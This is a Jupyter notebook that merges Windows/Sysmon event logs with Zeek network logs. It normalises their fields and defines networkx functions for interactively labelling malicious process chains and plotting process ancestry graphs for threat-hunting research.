# Apply All Labelling Approaches
------------------

- Graph Approach
- Threat Hunting Expanded
- Time Window Broad
- Time Window Micro

# Preparation

In [1]:
import pandas as pd, numpy as np, networkx as nx
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import chi2
from sklearn.linear_model.logistic import LogisticRegression
pd.options.display.max_columns = 500
pd.options.display.max_colwidth = 500

/home/jake/miniconda3/envs/py3msc/lib/python3.7/site-packages/sklearn/utils/deprecation.py:143: FutureWarning: The sklearn.linear_model.logistic module is  deprecated in version 0.22 and will be removed in version 0.24. The corresponding classes / functions should instead be imported from sklearn.linear_model. Anything that cannot be imported from sklearn.linear_model is now part of the private API.
  warnings.warn(message, FutureWarning)


In [2]:
df_label = pd.read_json('./df_labelled_coalesce.json', lines=True)
df_label['TP_Binary'] = df_label.TP_Label!='0'
df_label.replace('-', np.nan, inplace=True)
print(type(df_label))
print(df_label.shape)
print(df_label.EventID.value_counts())
df_label.head(1)

<class 'pandas.core.frame.DataFrame'>
(198760, 390)
12       61158
10       39286
7        20259
13       17542
4658     10973
         ...  
172          1
46           1
50103        1
306          1
41           1
Name: EventID, Length: 165, dtype: int64


,@timestamp,@version,Category,Channel,EventID,EventReceivedTime,EventTime,EventType,ExecutionProcessID,Hostname,IpAddress,IpPort,Keywords,LogonGuid,Message,Opcode,OpcodeValue,ProviderGuid,RecordNumber,ServiceName,ServiceSid,Severity,SeverityValue,SourceModuleName,SourceModuleType,SourceName,Status,TargetDomainName,TargetUserName,Task,ThreadID,TicketEncryptionType,TicketOptions,TransmittedServices,Version,host,port,tags,TP_Label,Action,ActivityID,CalloutKey,CalloutName,ChangeType,Conditions,FilterId,FilterKey,FilterName,FilterType,LayerId,LayerKey,LayerName,ProcessId,ProviderKey,ProviderName,UserName,UserSid,Weight,AccessList,AccessMask,AccessReason,HandleId,ObjectName,ObjectServer,ObjectType,PrivilegeList,ProcessName,ResourceAttributes,RestrictedSidCount,SubjectDomainName,SubjectLogonId,SubjectUserName,SubjectUserSid,TransactionId,ShareLocalPath,ShareName,RelativeTargetName,CommandLine,MandatoryLabel,NewProcessId,NewProcessName,ParentProcessName,TargetLogonId,TargetUserSid,TokenElevationType,Service,DisabledPrivilegeList,EnabledPrivilegeList,CallerProcessId,CallerProcessName,TargetSid,AuthenticationPackageName,ElevatedToken,ImpersonationLevel,KeyLength,LmPackageName,LogonProcessName,LogonType,RestrictedAdminMode,TargetLinkedLogonId,TargetOutboundDomainName,TargetOutboundUserName,VirtualAccount,WorkstationName,SourceHandleId,SourceProcessId,TargetHandleId,TargetProcessId,AccountName,AccountType,ContextInfo,Domain,Payload,UserID,NewThreadId,RuleName,SourceImage,SourceProcessGuid,StartAddress,StartFunction,StartModule,TargetImage,TargetProcessGuid,UtcTime,MessageNumber,MessageTotal,Path,ScriptBlockId,ScriptBlockText,AlgorithmName,KeyName,KeyType,Operation,ReturnCode,Archived,Hashes,Image,IsExecutable,ProcessGuid,TargetFilename,User,CreationUtcTime,Company,Description,FileVersion,ImageLoaded,OriginalFileName,Product,Signature,SignatureStatus,Signed,DestinationHostname,DestinationIp,DestinationIsIpv6,DestinationPort,DestinationPortName,Initiated,Protocol,SourceHostname,SourceIp,SourceIsIpv6,SourcePort,SourcePortName,NewSd,OldSd,PipeName,CurrentDirectory,IntegrityLevel,LogonId,ParentCommandLine,ParentImage,ParentProcessGuid,ParentProcessId,TerminalSessionId,CallTrace,GrantedAccess,SourceProcessGUID,SourceThreadId,TargetProcessGUID,Device,TargetObject,Details,Application,FilterRTID,LayerRTID,SourceAddress,DestAddress,DestPort,Direction,RemoteMachineID,RemoteUserID,BootMenuPolicy,NewValue,NewValueType,ObjectValueName,OldValue,OldValueType,OperationType,ProfileUsed,RuleId,QueryName,QueryResults,QueryStatus,PreviousCreationUtcTime,EventCountTotal,EventIdx,GroupMembership,param1,Properties,Hash,PreAuthType,ClientProcessId,CountOfCredentialsReturned,ProcessCreationTime,ReadOperation,TargetName,Type,CalloutId,CalloutType,CorruptionActionState,DeviceName,DriveName,Config,IsTestConfig,DirtyPages,HiveName,HiveNameLength,KeysUpdated,PackageName,Workstation,DeviceNameLength,DeviceTime,DeviceVersionMajor,DeviceVersionMinor,FinalStatus,UserData,ServiceAccount,ServiceFileName,ServiceStartType,ServiceType,param10,param11,param2,param3,param4,param5,param6,param7,param8,param9,SubLayerKey,SubLayerName,SubLayerType,Default SD String:,ClassId,ClassName,CompatibleIds,DeviceDescription,DeviceId,LocationInformation,VendorIds,TargetProcessName,SecurityPackageName,AdditionalInfo,AdditionalInfo2,ProviderType,RuleAttr,AdapterName,AdapterSuffixName,DnsServerList,ErrorCode,Ipaddress,Sent UpdateServer,TaskContentNew,TaskName,ActiveProfile,MiniportName,MiniportNameLen,GroupPolicyApplied,LogDroppedPacketsEnabled,LogSuccessfulConnectionsEnabled,MulticastFlowsEnabled,OperationMode,Profile,RemoteAdminEnabled,TargetInfo,TargetLogonGuid,TargetServerName,ClientCreationTime,TimeSource,ImagePath,StartType,ProfileChanged,BootType,LoadOptions,EntryCount,KeyFilePath,ProviderContextKey,ProviderContextName,ProviderContextType,DwordVal,InterfaceGuid,InterfaceName,NewProfile,OldProfile,InstanceId,MaxRunspaces,MinRunspaces,CurrentStratumNumber,TimeSourceRefId,ReasonForRejection,

In [3]:
df_zeek = pd.read_json("combined_zeek.log", lines = True)
df_zeek.replace('nan', np.nan, inplace=True)
print(type(df_zeek))
print(df_zeek.shape)
#print(df_zeek.EventID.value_counts())
df_zeek.head()

<class 'pandas.core.frame.DataFrame'>
(2140, 148)


,@stream,@system,@proc,ts,uid,id_orig_h,id_orig_p,id_resp_h,id_resp_p,proto,service,duration,orig_bytes,resp_bytes,conn_state,missed_bytes,history,orig_pkts,orig_ip_bytes,resp_pkts,resp_ip_bytes,orig_l2_addr,resp_l2_addr,rtt,named_pipe,endpoint,operation,trans_id,query,qclass,qclass_name,qtype,qtype_name,rcode,rcode_name,AA,TC,RD,RA,Z,answers,TTLs,rejected,analyzer,failure_reason,fuid,tx_hosts,rx_hosts,conn_uids,source,depth,analyzers,mime_type,filename,is_orig,seen_bytes,total_bytes,missing_bytes,overflow_bytes,timedout,md5,sha1,request_type,client,success,error_msg,till,forwardable,renewable,cipher,note,msg,sub,src,dst,p,actions,suppress_for,action,path,name,size,times_modified,times_accessed,times_created,times_changed,share_type,version,curve,server_name,resumed,established,cert_chain_fuids,client_cert_chain_fuids,subject,issuer,validation_status,resp_certificate_sha1,ja3,ja3s,notice,peer,addl,id,certificate_version,certificate_serial,certificate_subject,certificate_issuer,certificate_not_valid_before,certificate_not_valid_after,certificate_key_alg,certificate_sig_alg,certificate_key_type,certificate_key_length,certificate_exponent,basic_constraints_ca,extracted,extracted_cutoff,trans_depth,method,host,uri,user_agent,request_body_len,response_body_len,status_code,status_msg,tags,resp_fuids,resp_mime_types,client_header_names,orig_fuids,orig_mime_types,machine,compile_ts,os,subsystem,is_exe,is_64bit,uses_aslr,uses_dep,uses_code_integrity,uses_seh,has_import_table,has_export_table,has_cert_table,has_debug_data,section_names
0,conn,bobs.bigwheel.local,zeek,1.588205e+09,Cvf4XX17hSAgXDdGEd,10.0.1.6,54243.0,10.0.0.4,53.0,udp,dns,0.001528,39.0,55.0,SF,0.0,Dd,1.0,67.0,1.0,83.0,00:0d:3a:13:e3:69,12:34:56:78:9a:bc,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,conn,bobs.bigwheel.local,zeek,1.588205e+09,CJ21Le4zsTUcyKKi98,10.0.1.6,56880.0,10.0.0.4,445.0,tcp,"gssapi,smb,krb",10.761077,4020.0,1681.0,RSTO,0.0,ShADdaR,12.0,1307.0,11.0,2133.0,00:0d:3a:13:e3:69,12:34:56:78:9a:bc,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,conn,bobs.bigwheel.local,zeek,1.588205e+09,CnOP7t1eGGHf6LFfuk,10.0.1.6,65108.0,10.0.0.4,53.0,udp,dns,0.001599,36.0,104.0,SF,0.0,Dd,1.0,64.0,1.0,132.0,00:0d:3a:13:e3:69,12:34:56:78:9a:bc,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,conn,bobs.bigwheel.local,zeek,1.588205e+09,CvxbPE3MuO7boUdSc8,10.0.1.6,138.0,10.0.1.255,138.0,udp,NaN,NaN,NaN,NaN,S0,0.0,D,1.0,229.0,0.0,0.0,00:0d:3a:13:e3:69,ff:ff:ff:ff:ff:ff,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,N

In [4]:
# https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html
#    In [9]: result = pd.concat([df1, df4], axis=1, sort=False)
df_label = df_label.append(df_zeek, ignore_index=True, sort=False)

In [5]:
df_label.shape

(200900, 536)

In [6]:
df_label.head(1)

,@timestamp,@version,Category,Channel,EventID,EventReceivedTime,EventTime,EventType,ExecutionProcessID,Hostname,IpAddress,IpPort,Keywords,LogonGuid,Message,Opcode,OpcodeValue,ProviderGuid,RecordNumber,ServiceName,ServiceSid,Severity,SeverityValue,SourceModuleName,SourceModuleType,SourceName,Status,TargetDomainName,TargetUserName,Task,ThreadID,TicketEncryptionType,TicketOptions,TransmittedServices,Version,host,port,tags,TP_Label,Action,ActivityID,CalloutKey,CalloutName,ChangeType,Conditions,FilterId,FilterKey,FilterName,FilterType,LayerId,LayerKey,LayerName,ProcessId,ProviderKey,ProviderName,UserName,UserSid,Weight,AccessList,AccessMask,AccessReason,HandleId,ObjectName,ObjectServer,ObjectType,PrivilegeList,ProcessName,ResourceAttributes,RestrictedSidCount,SubjectDomainName,SubjectLogonId,SubjectUserName,SubjectUserSid,TransactionId,ShareLocalPath,ShareName,RelativeTargetName,CommandLine,MandatoryLabel,NewProcessId,NewProcessName,ParentProcessName,TargetLogonId,TargetUserSid,TokenElevationType,Service,DisabledPrivilegeList,EnabledPrivilegeList,CallerProcessId,CallerProcessName,TargetSid,AuthenticationPackageName,ElevatedToken,ImpersonationLevel,KeyLength,LmPackageName,LogonProcessName,LogonType,RestrictedAdminMode,TargetLinkedLogonId,TargetOutboundDomainName,TargetOutboundUserName,VirtualAccount,WorkstationName,SourceHandleId,SourceProcessId,TargetHandleId,TargetProcessId,AccountName,AccountType,ContextInfo,Domain,Payload,UserID,NewThreadId,RuleName,SourceImage,SourceProcessGuid,StartAddress,StartFunction,StartModule,TargetImage,TargetProcessGuid,UtcTime,MessageNumber,MessageTotal,Path,ScriptBlockId,ScriptBlockText,AlgorithmName,KeyName,KeyType,Operation,ReturnCode,Archived,Hashes,Image,IsExecutable,ProcessGuid,TargetFilename,User,CreationUtcTime,Company,Description,FileVersion,ImageLoaded,OriginalFileName,Product,Signature,SignatureStatus,Signed,DestinationHostname,DestinationIp,DestinationIsIpv6,DestinationPort,DestinationPortName,Initiated,Protocol,SourceHostname,SourceIp,SourceIsIpv6,SourcePort,SourcePortName,NewSd,OldSd,PipeName,CurrentDirectory,IntegrityLevel,LogonId,ParentCommandLine,ParentImage,ParentProcessGuid,ParentProcessId,TerminalSessionId,CallTrace,GrantedAccess,SourceProcessGUID,SourceThreadId,TargetProcessGUID,Device,TargetObject,Details,Application,FilterRTID,LayerRTID,SourceAddress,DestAddress,DestPort,Direction,RemoteMachineID,RemoteUserID,BootMenuPolicy,NewValue,NewValueType,ObjectValueName,OldValue,OldValueType,OperationType,ProfileUsed,RuleId,QueryName,QueryResults,QueryStatus,PreviousCreationUtcTime,EventCountTotal,EventIdx,GroupMembership,param1,Properties,Hash,PreAuthType,ClientProcessId,CountOfCredentialsReturned,ProcessCreationTime,ReadOperation,TargetName,Type,CalloutId,CalloutType,CorruptionActionState,DeviceName,DriveName,Config,IsTestConfig,DirtyPages,HiveName,HiveNameLength,KeysUpdated,PackageName,Workstation,DeviceNameLength,DeviceTime,DeviceVersionMajor,DeviceVersionMinor,FinalStatus,UserData,ServiceAccount,ServiceFileName,ServiceStartType,ServiceType,param10,param11,param2,param3,param4,param5,param6,param7,param8,param9,...,TargetLogonGuid,TargetServerName,ClientCreationTime,TimeSource,ImagePath,StartType,ProfileChanged,BootType,LoadOptions,EntryCount,KeyFilePath,ProviderContextKey,ProviderContextName,ProviderContextType,DwordVal,InterfaceGuid,InterfaceName,NewProfile,OldProfile,InstanceId,MaxRunspaces,MinRunspaces,CurrentStratumNumber,TimeSourceRefId,ReasonForRejection,Active,EdgeTraversal,EmbeddedContext,Flags,LocalAddresses,LocalOnlyMapped,LooseSourceMapped,ModifyingApplication,ModifyingUser,Origin,Profiles,RemoteAddresses,RuleStatus,SchemaVersion,SecurityOptions,CountNew,CountOld,EnabledNew,UpdateReason,NewTime,PreviousTime,NotificationPackageName,ShutdownActionType,ShutdownEventCode,ShutdownReason,BootMode,BuildVersion,MajorVersion,MinorVersion,QfeVersion,ServiceVersion,StartTime,EnableDisableReason,VsmPolicy,DCName,ProcessingMode,ProcessingTimeInMilliseconds,SupportInfo1,SupportInfo2,Gr

In [7]:
df_label.tail(1)

,@timestamp,@version,Category,Channel,EventID,EventReceivedTime,EventTime,EventType,ExecutionProcessID,Hostname,IpAddress,IpPort,Keywords,LogonGuid,Message,Opcode,OpcodeValue,ProviderGuid,RecordNumber,ServiceName,ServiceSid,Severity,SeverityValue,SourceModuleName,SourceModuleType,SourceName,Status,TargetDomainName,TargetUserName,Task,ThreadID,TicketEncryptionType,TicketOptions,TransmittedServices,Version,host,port,tags,TP_Label,Action,ActivityID,CalloutKey,CalloutName,ChangeType,Conditions,FilterId,FilterKey,FilterName,FilterType,LayerId,LayerKey,LayerName,ProcessId,ProviderKey,ProviderName,UserName,UserSid,Weight,AccessList,AccessMask,AccessReason,HandleId,ObjectName,ObjectServer,ObjectType,PrivilegeList,ProcessName,ResourceAttributes,RestrictedSidCount,SubjectDomainName,SubjectLogonId,SubjectUserName,SubjectUserSid,TransactionId,ShareLocalPath,ShareName,RelativeTargetName,CommandLine,MandatoryLabel,NewProcessId,NewProcessName,ParentProcessName,TargetLogonId,TargetUserSid,TokenElevationType,Service,DisabledPrivilegeList,EnabledPrivilegeList,CallerProcessId,CallerProcessName,TargetSid,AuthenticationPackageName,ElevatedToken,ImpersonationLevel,KeyLength,LmPackageName,LogonProcessName,LogonType,RestrictedAdminMode,TargetLinkedLogonId,TargetOutboundDomainName,TargetOutboundUserName,VirtualAccount,WorkstationName,SourceHandleId,SourceProcessId,TargetHandleId,TargetProcessId,AccountName,AccountType,ContextInfo,Domain,Payload,UserID,NewThreadId,RuleName,SourceImage,SourceProcessGuid,StartAddress,StartFunction,StartModule,TargetImage,TargetProcessGuid,UtcTime,MessageNumber,MessageTotal,Path,ScriptBlockId,ScriptBlockText,AlgorithmName,KeyName,KeyType,Operation,ReturnCode,Archived,Hashes,Image,IsExecutable,ProcessGuid,TargetFilename,User,CreationUtcTime,Company,Description,FileVersion,ImageLoaded,OriginalFileName,Product,Signature,SignatureStatus,Signed,DestinationHostname,DestinationIp,DestinationIsIpv6,DestinationPort,DestinationPortName,Initiated,Protocol,SourceHostname,SourceIp,SourceIsIpv6,SourcePort,SourcePortName,NewSd,OldSd,PipeName,CurrentDirectory,IntegrityLevel,LogonId,ParentCommandLine,ParentImage,ParentProcessGuid,ParentProcessId,TerminalSessionId,CallTrace,GrantedAccess,SourceProcessGUID,SourceThreadId,TargetProcessGUID,Device,TargetObject,Details,Application,FilterRTID,LayerRTID,SourceAddress,DestAddress,DestPort,Direction,RemoteMachineID,RemoteUserID,BootMenuPolicy,NewValue,NewValueType,ObjectValueName,OldValue,OldValueType,OperationType,ProfileUsed,RuleId,QueryName,QueryResults,QueryStatus,PreviousCreationUtcTime,EventCountTotal,EventIdx,GroupMembership,param1,Properties,Hash,PreAuthType,ClientProcessId,CountOfCredentialsReturned,ProcessCreationTime,ReadOperation,TargetName,Type,CalloutId,CalloutType,CorruptionActionState,DeviceName,DriveName,Config,IsTestConfig,DirtyPages,HiveName,HiveNameLength,KeysUpdated,PackageName,Workstation,DeviceNameLength,DeviceTime,DeviceVersionMajor,DeviceVersionMinor,FinalStatus,UserData,ServiceAccount,ServiceFileName,ServiceStartType,ServiceType,param10,param11,param2,param3,param4,param5,param6,param7,param8,param9,...,TargetLogonGuid,TargetServerName,ClientCreationTime,TimeSource,ImagePath,StartType,ProfileChanged,BootType,LoadOptions,EntryCount,KeyFilePath,ProviderContextKey,ProviderContextName,ProviderContextType,DwordVal,InterfaceGuid,InterfaceName,NewProfile,OldProfile,InstanceId,MaxRunspaces,MinRunspaces,CurrentStratumNumber,TimeSourceRefId,ReasonForRejection,Active,EdgeTraversal,EmbeddedContext,Flags,LocalAddresses,LocalOnlyMapped,LooseSourceMapped,ModifyingApplication,ModifyingUser,Origin,Profiles,RemoteAddresses,RuleStatus,SchemaVersion,SecurityOptions,CountNew,CountOld,EnabledNew,UpdateReason,NewTime,PreviousTime,NotificationPackageName,ShutdownActionType,ShutdownEventCode,ShutdownReason,BootMode,BuildVersion,MajorVersion,MinorVersion,QfeVersion,ServiceVersion,StartTime,EnableDisableReason,VsmPolicy,DCName,ProcessingMode,ProcessingTimeInMilliseconds,SupportInfo1,SupportInfo2,Gr

## Normalize Data Across Data Sources
------------------

### Timestamp, IP/Port Columns

In [8]:
df_label['time_stamp'] = df_label['@timestamp'].apply(lambda x: (pd.Timestamp(x)))

In [9]:
df_label['time_stamp'] = df_label['time_stamp'].fillna(df_label['ts'].apply(lambda x: (pd.to_datetime(x, unit='s', utc=True))))

In [10]:
# Transform Host Data - Similar Data to Single Columns
df_label['Destination_IP'] = df_label['DestinationIp']
df_label['Destination_IP'] = df_label['Destination_IP'].fillna(df_label['DestAddress'])
df_label['Source_IP'] = df_label['IpAddress']
df_label['Source_IP'] = df_label['Source_IP'].fillna(df_label['SourceIp'])
df_label['Source_IP'] = df_label['Source_IP'].fillna(df_label['SourceAddress'])
df_label['Source_Port'] = df_label['IpPort']
df_label['Source_Port'] = df_label['Source_Port'].fillna(df_label['SourcePort'])
df_label['Destination_Port'] = df_label['DestinationPort']
df_label['Destination_Port'] = df_label['Destination_Port'].fillna(df_label['DestPort'])

In [11]:
# Transform Network Data - Similar Data to Single Columns
df_label['Source_IP'] = df_label['Source_IP'].fillna(df_label['id_orig_h'])
df_label['Source_Port'] = df_label['Source_Port'].fillna(df_label['id_orig_p'])
df_label['Destination_IP'] = df_label['Destination_IP'].fillna(df_label['id_resp_h'])
df_label['Destination_Port'] = df_label['Destination_Port'].fillna(df_label['id_resp_p'])

### Beagle Column Formatting

In [12]:
# Sysmon Transformer
df_label['EventData_ParentImage'] = df_label['ParentImage'].astype(object)
df_label['EventData_ParentProcessId'] = df_label['ParentProcessId']
df_label['EventData_ParentProcessGuid'] = df_label['ParentProcessGuid']
df_label['EventData_Image'] = df_label['Image'].astype(object)
df_label['EventData_CommandLine'] = df_label['CommandLine'].astype(object)
df_label['EventData_Hashes'] = df_label['Hashes'].astype(object)

df_label['Computer'] = df_label['Hostname'].astype(object)
df_label['EventData_User'] = df_label['User'].astype(object)
df_label['EventData_UtcTime'] = df_label['UtcTime']

df_label['EventData_ProcessGuid'] = df_label['ProcessGuid']
df_label['EventData_ProcessId'] = df_label['ProcessId']

df_label['EventData_DestinationIp'] = df_label['DestinationIp']
df_label['EventData_DestinationPort'] = df_label['DestinationPort']
df_label['EventData_Protocol'] = df_label['Protocol']
df_label['EventData_TargetFilename'] = df_label['TargetFilename']

df_label['EventData_TargetObject'] = df_label['TargetObject']
df_label['EventData_EventType'] = df_label['EventType']
#df_label['EventData_Details'] = df_label['ProcessId']

### Process ID Column Hex->Int Conversion

In [13]:
df_label['ProcessID_Int'] = df_label.loc[(df_label.ProcessId.notna()) & (df_label.ProcessId.str.contains('x'))].ProcessId.apply(int, base=16)
df_label['ProcessID_Int'] = df_label['ProcessID_Int'].fillna(df_label.loc[(df_label.ProcessId.notna()) & (~df_label['ProcessId'].str.contains('x', na=False))]['ProcessId'].astype(int))

## Manual Recurse Ancestor Chain Functions

In [14]:
def eval_ancestor_chain(G, starting_guid):
    for (p, d) in G.nodes(data=True):
        if 'process_guid' in d['properties'].keys():
            if starting_guid in d['properties']['process_guid']:
                selected_node = p
                
    #ancestors = nx.ancestors(G, selected_node)
    malicious_ancestors = [selected_node]
    for i in nx.ancestors(G, selected_node):
        if(G.node[i]['_node_type'] == 'Process'):
            print("==========================================")
            print("Node Data:")
            print("==========================================")
            print(G.node[i])
            print("==========================================")
            answer = None
            while answer not in ("yes", "no"):
                answer = input("Malicious? Enter yes or no: ")
                if answer == "yes":
                    # Do this.
                    malicious_ancestors.append(i)
                elif answer == "no":
                    # Do that.
                    return malicious_ancestors
                else:
                    print("Please enter yes or no.")
    return malicious_ancestors

def determine_malicious_root_proc(G, starting_guid):
    malicious_ancestors = eval_ancestor_chain(G, starting_guid)
    print("")
    print("##########################################")
    print("Confirm this as the senior malicious node?")
    print("##########################################")
    print("Node Data:")
    print("==========================================")
    print(G.node[malicious_ancestors[-1]])
    print("==========================================")
    print("Edge Out Data:")
    print("==========================================")
    for i in G.out_edges(malicious_ancestors[-1], data=True):
        if i[2]['type'] == 'Launched':
            print(i[2]['type'])
            print(G.node[i[1]])
            print("==========================================")
    answer = None
    while answer not in ("yes", "no"):
        answer = input("Malicious? Enter yes or no: ")
        if answer == "yes":
            # Do this.
            return malicious_ancestors[-1]
        elif answer == "no":
            # Do that.
            print("Re-run the eval_ancestor chain")
            malicious_root_ancestor = determine_malicious_root_proc(G, starting_guid)
            return malicious_root_ancestor
        else:
            print("Please enter yes or no.")
            
def get_ancestor_descendant_graph(G, malicious_root_ancestor):
    print(malicious_root_ancestor)

    descendants = nx.descendants(G, malicious_root_ancestor) #Returns all nodes reachable from source in G.
    print(len(descendants))

    ancestors = nx.ancestors(G, malicious_root_ancestor)
    print(len(ancestors))

    suspected_malicious = list(ancestors) + list(descendants)
    suspected_malicious.append(malicious_root_ancestor)
    print(len(suspected_malicious))

    H = G.subgraph(suspected_malicious)
    return H, malicious_root_ancestor, ancestors, descendants

def print_ancestor_descendant_graph(H, malicious_root_ancestor, ancestors, descendants):
    from matplotlib.pyplot import figure
    # Why are there orphaned nodes? I forgot to add the OG node. Fixed.
    # https://networkx.github.io/documentation/networkx-1.9/examples/drawing/labels_and_colors.html
    #fig = plt.Figure()
    figure(figsize=(15, 12))
    pos=nx.kamada_kawai_layout(H) # positions for all nodes

    # nodes
    nx.draw_networkx_nodes(H,pos,
                       nodelist=list(ancestors),
                       node_color='r',
                       #node_size=500,
                       label='ancestors',
                   alpha=0.8)
    nx.draw_networkx_nodes(H,pos,
                       nodelist=list(descendants),
                       node_color='b',
                       #node_size=500,
                       label='descendants',
                   alpha=0.8)
    nx.draw_networkx_nodes(H,pos,
                       nodelist=[malicious_root_ancestor],
                       node_color='g',
                       #node_size=500,
                       label='starting-point',
                   alpha=0.8)

    # edges
    nx.draw_networkx_edges(H,pos,width=1.0,alpha=0.5)

    #plt.legend()
    plt.legend(loc='upper left')
    #fig.update_layout(legend=dict(x=-.1, y=1.2))
    plt.axis('off')
    print("Saving as: ancestor_descendants_" + str(malicious_root_ancestor) + ".png")
    plt.savefig("ancestor_descendants_" + str(malicious_root_ancestor) + ".png") # save as png
    plt.show() # display
    
def get_ancestor_descendant_types(H):
    file_nodes = []
    for (p, d) in H.nodes(data=True):
        if d['_node_type']=='File':
            file_nodes.append(p)
    len(file_nodes)

    proc_nodes = []
    for (p, d) in H.nodes(data=True):
        if d['_node_type']=='Process':
            proc_nodes.append(p)
    len(proc_nodes)

    ip_nodes = []
    for (p, d) in H.nodes(data=True):
        if d['_node_type']=='IP Address':
            ip_nodes.append(p)
    len(ip_nodes)
    
    return file_nodes, proc_nodes, ip_nodes

def print_ancestor_descendant_type_graph(H, malicious_root_ancestor, file_nodes, proc_nodes, ip_nodes):
    # Why are there orphaned nodes? I forgot to add the OG node. Fixed.
    # https://networkx.github.io/documentation/networkx-1.9/examples/drawing/labels_and_colors.html
    #fig = plt.Figure()
    figure(figsize=(15, 12))
    pos=nx.kamada_kawai_layout(H) # positions for all nodes

    # nodes
    nx.draw_networkx_nodes(H,pos,
                           nodelist=file_nodes,
                           node_color='r',
                           #node_size=500,
                           label='file_nodes',
                       alpha=0.8)
    nx.draw_networkx_nodes(H,pos,
                           nodelist=proc_nodes,
                           node_color='b',
                           #node_size=500,
                           label='proc_nodes',
                       alpha=0.8)
    nx.draw_networkx_nodes(H,pos,
                           nodelist=ip_nodes,
                           node_color='g',
                           #node_size=500,
                           label='ip_nodes',
                       alpha=0.8)

    # edges
    nx.draw_networkx_edges(H,pos,width=1.0,alpha=0.5)

    #plt.legend()
    plt.legend(loc='upper left')
    #fig.update_layout(legend=dict(x=-.1, y=1.2))
    plt.axis('off')
    print("Saving as: ancestor_descendants_nodeType_" + str(malicious_root_ancestor) + ".png")
    plt.savefig("ancestor_descendants_nodeType_" + str(malicious_root_ancestor) + ".png") # save as png
    plt.show() # display
    
def analyze_graph_vs_label_proc(H, proc_nodes):
    graph_bad_guids = []
    for i in proc_nodes:
        graph_bad_guids.append(H.node[i]['properties']['process_guid'])
    print(len(graph_bad_guids))
    #print(graph_bad_guids)
    
    label_bad_guids = df_label.loc[(df_label['TP_Binary'] == True) & (df_label.ProcessGuid.notnull())]['ProcessGuid'].unique()
    pd_all_guids = df_label.loc[(df_label.ProcessGuid.notnull()) & (df_label.CommandLine.notnull())][['ProcessGuid', 'Hostname', 'TP_Binary', 'CommandLine']]
    pd_all_guids['orig_label'] = False
    pd_all_guids['orig_label'].loc[pd_all_guids.ProcessGuid.isin(label_bad_guids)] = True

    pd_all_guids = pd_all_guids.drop(columns=['TP_Binary']).drop_duplicates()
    pd_all_guids['graph_label'] = False
    pd_all_guids['graph_label'].loc[pd_all_guids.ProcessGuid.isin(graph_bad_guids)] = True

    with pd.option_context('display.max_rows', None, 'display.max_columns', None, 'display.max_colwidth', None):
        display(pd_all_guids[['ProcessGuid', 'Hostname', 'orig_label', 'graph_label', 'CommandLine']].loc[((pd_all_guids.orig_label==True) | (pd_all_guids.graph_label==True))].sort_values(by=['orig_label', 'graph_label'], ascending=False))
        
def manual_recurse_pipeline(G, starting_point):
    malicious_root_ancestor = determine_malicious_root_proc(G, starting_point)
    print(malicious_root_ancestor)
    
    H, malicious_root_ancestor, ancestors, descendants = get_ancestor_descendant_graph(G, malicious_root_ancestor)
    
    print_ancestor_descendant_graph(H, malicious_root_ancestor, ancestors, descendants)
    
    file_nodes, proc_nodes, ip_nodes = get_ancestor_descendant_types(H)
    
